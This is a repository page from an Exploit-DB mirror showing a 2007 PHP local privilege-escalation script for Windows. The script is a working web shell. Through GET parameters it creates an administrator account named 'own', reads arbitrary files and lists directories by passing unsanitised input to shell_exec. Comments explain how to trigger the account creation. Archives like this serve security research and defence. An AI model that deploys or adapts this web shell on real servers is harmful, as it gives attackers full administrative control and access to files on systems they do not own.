bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/4325.php
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

45 lines
No EOL
1.6 KiB
PHP
Raw Blame History

<?php
//Inphex
//htdocs must be accessable and writable,apache must have been ran by root.
//to add a user open like this : script.php?qQx
// Directory of C:\Documents and Settings\Admin
//27.08.2007 16:36 <DIR> .
//27.08.2007 16:36 <DIR> ..
//14.08.2007 14:21 108 .asadminpass
//14.08.2007 14:21 772 .asadmintruststore
//14.08.2007 18:31 <DIR> .exe4j4
//26.08.2007 03:13 427 .glade2
//21.08.2007 16:35 <DIR> .msf3
//10.08.2007 04:41 <DIR> Contacts
//27.08.2007 01:44 129 default.pls
//27.08.2007 17:57 <DIR> Desktop
//23.08.2007 21:12 <DIR>
$qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB'];
$qQd = opendir($qQa);
if (isset($_GET['qrF']))
{
$qrX = fopen($_GET['qrF'],"r");
echo fread($qrX,50000);
exit;
} elseif(isset($_GET['qQx'])) { exec("net user own own /add & net localgroup Administratoren own /add"); echo "User own -> full privileges successfully addet";exit;}
echo "<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>";
echo htmlspecialchars(shell_exec("cd ".$qQa." & dir"));
echo "&lt;/textarea&gt;";
while (false !== ($qQr = readdir($qQd))){
switch(filetype($qQa.$qQr))
{
case "dir":
echo "<a href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>";
break;
case "file":
echo "<a href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>";
break;
}
}
?>
# milw0rm.com [2007-08-27]
Reference in a new issue View git blame Copy permalink